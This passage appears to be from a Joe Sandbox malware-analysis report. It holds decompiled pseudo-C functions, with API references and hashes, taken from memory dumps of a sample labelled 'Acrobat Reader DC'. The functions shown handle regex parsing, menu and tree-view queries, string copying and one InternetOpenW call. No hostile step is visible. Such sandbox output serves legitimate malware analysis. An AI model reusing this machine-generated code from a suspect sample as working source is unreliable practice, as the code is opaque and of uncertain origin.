                                  									if(_t96 != 0x5c) {
                                  										break;
                                  									}
                                  									_t140 =  &(_t140[2]);
                                  									if( *_t140 != 0x45) {
                                  										_t99 = E00416931(_t114, _t140, "Q\\E", 3);
                                  										_t140 = _v8;
                                  										_t141 = _t141 + 0xc;
                                  										if(_t99 == 0) {
                                  											_t140 =  &(_t140[4]);
                                  											_v8 = _t140;
                                  											continue;
                                  										}
                                  									} else {
                                  										_v8 = _t140;
                                  										continue;
                                  									}
                                  									L55:
                                  									if(_t140[1] == 0x5d && ( *(_t139 + 0x44) & 0x02000000) == 0) {
                                  										_t140 =  &(_t140[1]);
                                  									}
                                  									_t140 =  &(_t140[1]);
                                  									_v8 = _t140;
                                  									_t83 =  *_t140;
                                  									if(_t83 == 0x5d) {
                                  										goto L96;
                                  									} else {
                                  										while(_t83 != 0) {
                                  											if(_t83 != 0x5c) {
                                  												L67:
                                  												_t140 =  &(_t140[1]);
                                  												_v8 = _t140;
                                  												_t83 =  *_t140;
                                  												if(_t83 != 0x5d) {
                                  													continue;
                                  												} else {
                                  													goto L96;
                                  												}
                                  											} else {
                                  												_t140 =  &(_t140[1]);
                                  												_v8 = _t140;
                                  												_t97 =  *_t140;
                                  												if(_t97 == 0) {
                                  													goto L101;
                                  												} else {
                                  													if(_t97 != 0x51) {
                                  														goto L67;
                                  													} else {
                                  														while(1) {
                                  															_t140 =  &(_t140[1]);
                                  															_v8 = _t140;
                                  															_t98 =  *_t140;
                                  															if(_t98 == 0) {
                                  																goto L101;
                                  															}
                                  															if(_t98 != 0x5c) {
                                  																continue;
                                  															} else {
                                  																if(_t98 == 0) {
                                  																	goto L101;
                                  																} else {
                                  																	_t140 =  &(_t140[1]);
                                  																	_v8 = _t140;
                                  																	if( *_t140 != 0x45) {
                                  																		continue;
                                  																	} else {
                                  																		goto L67;
                                  																	}
                                  																}
                                  															}
                                  															goto L107;
                                  														}
                                  														goto L101;
                                  													}
                                  												}
                                  											}
                                  											goto L107;
                                  										}
                                  										goto L102;
                                  									}
                                  									goto L107;
                                  								}
                                  								if(_t112 == 0 && _t96 == 0x5e) {
                                  									_t140 =  &(_t140[1]);
                                  									_t112 = 1;
                                  									_v8 = _t140;
                                  									goto L47;
                                  								}
                                  								goto L55;
                                  							}
                                  							goto L107;
                                  						}
                                  					}
                                  				} else {
                                  					_t121 = _t140[1];
                                  					if(_t121 != 0x2a) {
                                  						if(_t121 == 0x3f) {
                                  							_t122 = _t140[2];
                                  							if(_t122 != 0x7c) {
                                  								if(_t122 != 0x23) {
                                  									_t140 =  &(_t140[2]);
                                  									_v8 = _t140;
                                  									if(_t122 != 0x28) {
                                  										if( *_t140 == 0x50) {
                                  											_t140 =  &(_t140[1]);
                                  											_v8 = _t140;
                                  										}
                                  										_t123 =  *_t140;
                                  										if(_t123 != 0x3c) {
                                  											L23:
                                  											if(_t123 != 0x27) {
                                  												goto L35;
                                  											} else {
                                  												goto L24;
                                  											}
                                  										} else {
                                  											_t137 = _t140[1];
                                  											if(_t137 == 0x21 || _t137 == 0x3d) {
                                  												goto L23;
                                  											} else {
                                  												L24:
                                  												_t88 = _t82 + 1;
                                  												 *_t111 = _t88;
                                  												if(_t138 != 0 || _t88 != _a16) {
                                  													_t102 =  *_t140 & 0x000000ff;
                                  													_t140 =  &(_t140[1]);
                                  													_v8 = _t140;
                                  													if(_t102 == 0x3c) {
                                  														_t102 = 0x3e;
                                  													}
                                  													_t124 = _t140;
                                  													while(( *_t140 & 0x000000ff) != _t102) {
                                  														_t140 =  &(_t140[1]);
                                  														_v8 = _t140;
                                  													}
                                  													if(_t138 == 0 || _a16 != _t140 - _t124) {
                                  														goto L35;
                                  													} else {
                                  														_t105 = E00416931(_t124, _t138, _t124, _a16);
                                  														_t141 = _t141 + 0xc;
                                  														if(_t105 != 0) {
                                  															_t140 = _v8;
                                  															goto L35;
                                  														} else {
                                  															return  *_t111;
                                  														}
                                  													}
                                  												} else {
                                  													goto L106;
                                  												}
                                  											}
                                  										}
                                  									} else {
                                  										if(_t140[1] != 0x3f) {
                                  											_t107 =  *_t140;
                                  											if(_t107 != 0) {
                                  												while(_t107 != 0x29) {
                                  													_t140 =  &(_t140[1]);
                                  													_v8 = _t140;
                                  													_t107 =  *_t140;
                                  													if(_t107 != 0) {
                                  														continue;
                                  													} else {
                                  													}
                                  													goto L35;
                                  												}
                                  												if( *_t140 != 0) {
                                  													goto L17;
                                  												}
                                  											}
                                  										}
                                  										goto L35;
                                  									}
                                  								} else {
                                  									_t140 =  &(_t140[3]);
                                  									_v8 = _t140;
                                  									_t108 =  *_t140;
                                  									if(_t108 == 0) {
                                  										L101:
                                  										_t83 = _a4;
                                  										 *_t83 = _t140;
                                  										L102:
                                  										return _t83 | 0xffffffff;
                                  									} else {
                                  										while(_t108 != 0x29) {
                                  											_t140 =  &(_t140[1]);
                                  											_v8 = _t140;
                                  											_t108 =  *_t140;
                                  											if(_t108 != 0) {
                                  												continue;
                                  											} else {
                                  												_t109 = _a4;
                                  												 *_t109 = _t140;
                                  												return _t109 | 0xffffffff;
                                  											}
                                  											goto L107;
                                  										}
                                  										goto L101;
                                  									}
                                  								}
                                  							} else {
                                  								_t140 =  &(_t140[3]);
                                  								_v8 = _t140;
                                  								_v16 = 1;
                                  								goto L35;
                                  							}
                                  						} else {
                                  							_t88 = _t82 + 1;
                                  							 *_t111 = _t88;
                                  							if(_t138 != 0 || _t88 != _a16) {
                                  								L17:
                                  								_t140 =  &(_t140[1]);
                                  								_v8 = _t140;
                                  								goto L35;
                                  							} else {
                                  								L106:
                                  								return _t88;
                                  							}
                                  						}
                                  					} else {
                                  						_t140 =  &(_t140[2]);
                                  						_v8 = _t140;
                                  						goto L35;
                                  					}
                                  				}
                                  				L107:
                                  			}








































                                  0x0042f5b7
                                  0x0042f5b5
                                  0x0042f5ad
                                  0x00000000
                                  0x0042f5a3
                                  0x00000000
                                  0x0042f599
                                  0x00000000
                                  0x0042f593
                                  0x0042f56a
                                  0x0042f570
                                  0x0042f571
                                  0x0042f576
                                  0x00000000
                                  0x0042f576
                                  0x00000000
                                  0x0042f56a
                                  0x00000000
                                  0x0042f52d
                                  0x0042f4dd
                                  0x0042f3a4
                                  0x0042f3a4
                                  0x0042f3aa
                                  0x0042f718
                                  0x0042f3bb
                                  0x0042f3c1
                                  0x0042f3d8
                                  0x0042f40b
                                  0x0042f40e
                                  0x0042f414
                                  0x0042f452
                                  0x0042f454
                                  0x0042f455
                                  0x0042f455
                                  0x0042f458
                                  0x0042f45d
                                  0x0042f46c
                                  0x0042f46f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f45f
                                  0x0042f45f
                                  0x0042f465
                                  0x00000000
                                  0x0042f471
                                  0x0042f471
                                  0x0042f471
                                  0x0042f472
                                  0x0042f476
                                  0x0042f481
                                  0x0042f484
                                  0x0042f485
                                  0x0042f48b
                                  0x0042f48d
                                  0x0042f48d
                                  0x0042f495
                                  0x0042f499
                                  0x0042f49b
                                  0x0042f49c
                                  0x0042f4a2
                                  0x0042f4a8
                                  0x00000000
                                  0x0042f4b3
                                  0x0042f4b9
                                  0x0042f4be
                                  0x0042f4c3
                                  0x0042f4ce
                                  0x00000000
                                  0x0042f4c5
                                  0x0042f4cd
                                  0x0042f4cd
                                  0x0042f4c3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f476
                                  0x0042f465
                                  0x0042f416
                                  0x0042f41a
                                  0x0042f420
                                  0x0042f424
                                  0x0042f42a
                                  0x0042f42e
                                  0x0042f42f
                                  0x0042f432
                                  0x0042f436
                                  0x00000000
                                  0x00000000
                                  0x0042f438
                                  0x00000000
                                  0x0042f436
                                  0x0042f440
                                  0x00000000
                                  0x00000000
                                  0x0042f440
                                  0x0042f424
                                  0x00000000
                                  0x0042f41a
                                  0x0042f3da
                                  0x0042f3da
                                  0x0042f3dd
                                  0x0042f3e0
                                  0x0042f3e4
                                  0x0042f706
                                  0x0042f706
                                  0x0042f709
                                  0x0042f70d
                                  0x0042f714
                                  0x0042f3ea
                                  0x0042f3ea
                                  0x0042f3f2
                                  0x0042f3f3
                                  0x0042f3f6
                                  0x0042f3fa
                                  0x00000000
                                  0x0042f3fc
                                  0x0042f3fc
                                  0x0042f400
                                  0x0042f40a
                                  0x0042f40a
                                  0x00000000
                                  0x0042f3fa
                                  0x00000000
                                  0x0042f3ea
                                  0x0042f3e4
                                  0x0042f3c3
                                  0x0042f3c3
                                  0x0042f3c6
                                  0x0042f3c9
                                  0x00000000
                                  0x0042f3c9
                                  0x0042f71e
                                  0x0042f71e
                                  0x0042f71f
                                  0x0042f723
                                  0x0042f446
                                  0x0042f446
                                  0x0042f447
                                  0x00000000
                                  0x0042f738
                                  0x0042f738
                                  0x0042f738
                                  0x0042f738
                                  0x0042f723
                                  0x0042f3b0
                                  0x0042f3b0
                                  0x0042f3b3
                                  0x00000000
                                  0x0042f3b3
                                  0x0042f3aa
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _strncmp
                                  • String ID: Q\E
                                  • API String ID: 909875538-2189900498
                                  • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                  • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E004440E0(int _a4, intOrPtr* _a8, int _a12) {
                                  				struct tagMENUITEMINFOW _v52;
                                  				void* __edi;
                                  				void* __esi;
                                  				int _t28;
                                  				signed int _t30;
                                  				intOrPtr _t34;
                                  				signed int _t35;
                                  				signed int _t38;
                                  				int _t42;
                                  				struct HMENU__* _t52;
                                  				signed int* _t55;
                                  
                                  				_t28 = _a4;
                                  				_t55 = _a12;
                                  				_a12 = 0xffffffff;
                                  				if(_t28 == 5 || _t28 == 6) {
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					if(_t28 == 3 || _t28 == 4) {
                                  						_t42 = _t28;
                                  						goto L8;
                                  					} else {
                                  						if(E00434179(0x4a8710, _t28,  &_a12) != 0) {
                                  							_t42 = _a12;
                                  							L8:
                                  							_t30 =  *(0x4a88c4 + _t42 * 4);
                                  							 *_t55 = 0;
                                  							__eflags = _t30;
                                  							if(_t30 == 0) {
                                  								goto L5;
                                  							} else {
                                  								_t52 =  *_t30;
                                  								_v52.cbSize = 0x30;
                                  								E00412F40( &(_v52.fMask), 0, 0x2c);
                                  								__eflags = _t52;
                                  								if(__eflags == 0) {
                                  									L24:
                                  									__eflags = 0;
                                  									return 0;
                                  								} else {
                                  									_push(0x208);
                                  									_t34 = E004115D7(_t52, _t55, __eflags);
                                  									 *_a8 = _t34;
                                  									_v52.fMask = 0x11;
                                  									_v52.dwTypeData = _t34;
                                  									_v52.cch = 0x104;
                                  									_t35 = GetMenuItemInfoW(_t52, _t42, 0,  &_v52);
                                  									__eflags = _t35;
                                  									if(_t35 == 0) {
                                  										L23:
                                  										_push( *_a8);
                                  										E004111DC();
                                  										goto L24;
                                  									} else {
                                  										__eflags = _v52.fType & 0x00000800;
                                  										if((_v52.fType & 0x00000800) != 0) {
                                  											goto L23;
                                  										} else {
                                  											_t38 = _v52.fState;
                                  											__eflags = _t38 & 0x00000003;
                                  											if((_t38 & 0x00000003) == 0) {
                                  												 *_t55 =  *_t55 | 0x00000040;
                                  												__eflags =  *_t55;
                                  											} else {
                                  												 *_t55 =  *_t55 | 0x00000080;
                                  											}
                                  											__eflags = _t38 & 0x00008080;
                                  											if((_t38 & 0x00008080) != 0) {
                                  												 *_t55 =  *_t55 | 0x00000100;
                                  												__eflags =  *_t55;
                                  											}
                                  											__eflags = _t38 & 0x00000008;
                                  											if((_t38 & 0x00000008) == 0) {
                                  												 *_t55 =  *_t55 | 0x00000004;
                                  												__eflags =  *_t55;
                                  											} else {
                                  												 *_t55 =  *_t55 | 0x00000001;
                                  											}
                                  											__eflags = _t38 & 0x00001000;
                                  											if((_t38 & 0x00001000) != 0) {
                                  												 *_t55 =  *_t55 | 0x00000200;
                                  												__eflags =  *_t55;
                                  											}
                                  											return 1;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							L5:
                                  							return 0;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • _memset.LIBCMT ref: 00444158
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00444193
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InfoItemMenu_memset
                                  • String ID: 0
                                  • API String ID: 2223754486-4108050209
                                  • Opcode ID: 01492e4d25bc2bd65c26aecb51fb71c87790512efaa9bc24c35de0538d27af29
                                  • Instruction ID: 58443bb6ec7987cf46203e674686192f5cc98237d9d33e2b35fa29f462c9b90c
                                  • Opcode Fuzzy Hash: 01492e4d25bc2bd65c26aecb51fb71c87790512efaa9bc24c35de0538d27af29
                                  • Instruction Fuzzy Hash: 9631E3715002049BF720CF58DC89BAAB7A8FB99310F14451FED41D62A0EBB99990CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044835A(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				int _v20;
                                  				int _v24;
                                  				intOrPtr _v32;
                                  				void _v48;
                                  				void _v92;
                                  				long _v96;
                                  				void* _v100;
                                  				intOrPtr _t46;
                                  				intOrPtr _t47;
                                  				long _t50;
                                  				struct HWND__** _t53;
                                  				long _t55;
                                  				intOrPtr _t59;
                                  				intOrPtr _t63;
                                  				intOrPtr _t67;
                                  				struct HWND__* _t68;
                                  				intOrPtr _t79;
                                  				struct HWND__* _t84;
                                  
                                  				if(E00441AF5(0x4a8630, _a16,  &_a16,  &_v8) != 0) {
                                  					_t63 =  *0x4a8690; // 0x0
                                  					_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + _a16 * 4))));
                                  					if( *((intOrPtr*)(_t59 + 0x1b0)) == 0) {
                                  						goto L1;
                                  					} else {
                                  						_t46 =  *((intOrPtr*)(_t59 + 0x1b8));
                                  						_v48 = 5;
                                  						if(_t46 >= 0 ||  *((intOrPtr*)(_t59 + 0x1bc)) >= 0) {
                                  							_v48 = 0x27;
                                  							_v24 = 0;
                                  							_v20 = 0;
                                  						}
                                  						if(_t46 >= 0) {
                                  							_v20 = _t46;
                                  						}
                                  						_t47 =  *((intOrPtr*)(_t59 + 0x1bc));
                                  						if(_t47 >= 0) {
                                  							_v24 = _t47;
                                  						}
                                  						_v12 = _a8;
                                  						_v32 = _a12;
                                  						memcpy( &_v92,  &_v48, 0xa << 2);
                                  						_t50 =  *(_t59 + 0x1b4);
                                  						_v96 = 0xffff0001;
                                  						if(_t50 != 0) {
                                  							_v96 = _t50;
                                  						}
                                  						_t67 =  *0x4a86a4; // 0xa51ad0
                                  						_t53 =  *( *(_t67 + _v8 * 4));
                                  						_t68 = _t53[0x22];
                                  						if(_t68 != 0x10) {
                                  							_t84 = _t53[0xc];
                                  						} else {
                                  							_t84 =  *_t53;
                                  						}
                                  						if(_t68 != 0x10) {
                                  							_v100 = _t53[3];
                                  						} else {
                                  							_v100 = 0xffff0000;
                                  						}
                                  						_t55 = SendMessageW(_t84, 0x1132, 0,  &_v100);
                                  						_t79 = _a4;
                                  						 *(_t79 + 0xc) = _t55;
                                  						 *(_t79 + 0x30) = _t84;
                                  						 *((short*)(_t79 + 0x80)) = SendMessageW(_t84, 0x1105, 0, 0);
                                  						 *(_t59 + 0x1b4) =  *(_t79 + 0xc);
                                  						return 1;
                                  					}
                                  				} else {
                                  					L1:
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: '
                                  • API String ID: 3850602802-1997036262
                                  • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                  • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E0040BD80(void* __eax, signed int __ebx, intOrPtr* __ecx, void* __fp0, intOrPtr* _a4) {
                                  				intOrPtr _v8;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t38;
                                  				intOrPtr* _t39;
                                  				signed int _t40;
                                  				signed int _t41;
                                  				signed int _t42;
                                  				intOrPtr _t44;
                                  				signed int _t59;
                                  				void* _t80;
                                  				intOrPtr* _t83;
                                  				void* _t85;
                                  				void* _t86;
                                  				void* _t95;
                                  
                                  				_t95 = __fp0;
                                  				_t59 = __ebx;
                                  				_push(__ecx);
                                  				_t80 = __eax;
                                  				_t83 = __ecx;
                                  				if(__eax == 0) {
                                  					L7:
                                  					return _t83;
                                  				}
                                  				_t38 =  *((intOrPtr*)(_a4 + 4));
                                  				if(__ebx >= _t38) {
                                  					goto L7;
                                  				}
                                  				if(__eax != 0xffffffff) {
                                  					__eflags = __ebx + __eax - _t38;
                                  					if(__eflags <= 0) {
                                  						L4:
                                  						_t3 = _t83 + 0xc; // 0xd0558b1d
                                  						_t39 =  *_t3;
                                  						if( *_t39 > 1) {
                                  							 *_t39 =  *_t39 - 1;
                                  							_push(4);
                                  							_t40 = E004115D7(_t80, _t83, __eflags);
                                  							_t86 = _t85 + 4;
                                  							__eflags = _t40;
                                  							if(_t40 == 0) {
                                  								_t40 = 0;
                                  							} else {
                                  								 *_t40 = 1;
                                  							}
                                  							_t17 = _t83 + 4; // 0x74000049
                                  							 *(_t83 + 0xc) = _t40;
                                  							_t20 = _t80 + 1; // 0x7400004a
                                  							_t41 =  *_t17 + _t20;
                                  							 *(_t83 + 8) = _t41;
                                  							__eflags = _t41;
                                  							if(__eflags == 0) {
                                  								_t42 = 8;
                                  							} else {
                                  								_t42 = (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3);
                                  								__eflags = _t42;
                                  							}
                                  							 *(_t83 + 8) = _t42;
                                  							_push( ~(0 | __eflags > 0x00000000) | _t42 * 0x00000002);
                                  							_t44 = E004115D7(_t80, _t83, __eflags);
                                  							_t29 = _t83 + 4; // 0x74000049
                                  							_t31 =  *_t29 + 2; // 0x7400004b
                                  							_v8 = _t44;
                                  							E00410E60(_t44,  *_t83,  *_t29 + _t31);
                                  							_t85 = _t86 + 0x10;
                                  							 *_t83 = _v8;
                                  							L6:
                                  							_t6 = _t83 + 4; // 0x74000049
                                  							E00410E60( *_t83 +  *_t6 * 2,  *_a4 + _t59 * 2, _t80 + _t80);
                                  							 *(_t83 + 4) =  *(_t83 + 4) + _t80;
                                  							_t14 = _t83 + 4; // 0x74000049
                                  							 *((short*)( *_t83 +  *_t14 * 2)) = 0;
                                  							goto L7;
                                  						}
                                  						_t4 = _t83 + 4; // 0x74000049
                                  						E00402F00( *_t4 + _t80, _t83, _t95);
                                  						goto L6;
                                  					}
                                  				}
                                  				_t80 = _t38 - _t59;
                                  				goto L4;
                                  			}



















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: Error:
                                  • API String ID: 4104443479-232661952
                                  • Opcode ID: f964171bc22d0a42f16369dbad18f2cd434c0b18babede9fc6fedef28322a13d
                                  • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                  • Opcode Fuzzy Hash: f964171bc22d0a42f16369dbad18f2cd434c0b18babede9fc6fedef28322a13d
                                  • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00444006(int _a4, signed int _a8) {
                                  				struct tagMENUITEMINFOW _v52;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t29;
                                  				signed int _t36;
                                  				int _t39;
                                  
                                  				_t29 = _a8;
                                  				_t39 = _a4;
                                  				_a8 = 0xffffffff;
                                  				if(_t39 != 0) {
                                  					if(_t39 == 5 || _t39 == 6) {
                                  						return 0;
                                  					} else {
                                  						if(_t39 == 3 || _t39 == 4) {
                                  							_t36 = _t39;
                                  							goto L10;
                                  						} else {
                                  							if(E00434179(0x4a8710, _t39,  &_a8) != 0) {
                                  								_t36 = _a8;
                                  								L10:
                                  								if( *(0x4a88c4 + _t36 * 4) == 0 || ( *(0x4a88c4 + _t36 * 4))[1] == 0) {
                                  									goto L7;
                                  								} else {
                                  									_v52.cbSize = 0x30;
                                  									E00412F40( &(_v52.fMask), 0, 0x2c);
                                  									_v52.fMask = 4;
                                  									if(GetMenuItemInfoW( *( *(0x4a88c4 + _t36 * 4)), _t39, 0,  &_v52) == 0) {
                                  										goto L7;
                                  									} else {
                                  										 *_t29 = _v52.hSubMenu;
                                  										return 1;
                                  									}
                                  								}
                                  							} else {
                                  								L7:
                                  								return 0;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_t27 =  *0x4a8710; // 0x8045b
                                  					 *_t29 = _t27;
                                  					return _t39 + 1;
                                  				}
                                  			}









                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 3577af1d957b7204fdd46e1a4f9341c5b1a9bc6f86c8f2c685067796396eaca7
                                  • Instruction ID: 69519e99fff9c3611eeaecbf8f45cf93f87690a028603bc06d4aa4e0618ad1d9
                                  • Opcode Fuzzy Hash: 3577af1d957b7204fdd46e1a4f9341c5b1a9bc6f86c8f2c685067796396eaca7
                                  • Instruction Fuzzy Hash: 92210D7290011457EB20DF4CEC84BEBB764F79A320F44412FEE5897290D779A854C7D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InternetOpen
                                  • String ID: <local>
                                  • API String ID: 2038078732-4266983199
                                  • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                  • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                  • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                  • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0044CE43(void* __ecx, void* __eflags, char _a4) {
                                  				intOrPtr _v8;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t18;
                                  				signed int _t20;
                                  				void* _t27;
                                  				intOrPtr _t28;
                                  				void* _t34;
                                  				signed int _t35;
                                  				void* _t38;
                                  				signed int _t41;
                                  
                                  				_t28 =  *((intOrPtr*)(E00432520( &_a4) + 8));
                                  				_t18 = E00443106( &_a4);
                                  				_v8 = _t18;
                                  				_t20 = _t18 - 1 >> 2;
